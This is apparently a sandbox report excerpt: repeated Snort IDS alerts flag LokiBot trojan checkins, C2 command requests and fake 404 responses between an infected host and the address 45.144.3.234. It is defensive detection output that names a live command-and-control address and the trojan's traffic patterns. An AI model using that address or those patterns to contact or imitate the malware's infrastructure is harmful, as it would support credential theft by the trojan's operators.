                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49751 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49751 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49751
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49752 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49752 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49752 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49752 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49752
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49753 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49753 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49753 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49753 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49753
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49754 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49754 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49754 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49754 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49754
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49755 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49755 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49755 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49755 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49755
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49756 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49756 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49756 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49756 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49756
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49757 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49757 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49757 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49757 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49757
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49758
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49759
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49760
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49761
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49762
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49763
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49764
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49765
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49766
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49767
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49768
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49769
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49770
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49771
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49772
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49773
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49774
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49775
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49776
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49778
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49779
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49781
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49783
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49787
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49789
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49791
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49793
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49795
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49797
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49799
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49800
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49802
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49804
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49805
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49806 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49806 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49806 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49806 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49806
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49807
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49809 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49809 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49809 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49809 -> 45.144.3.234:80
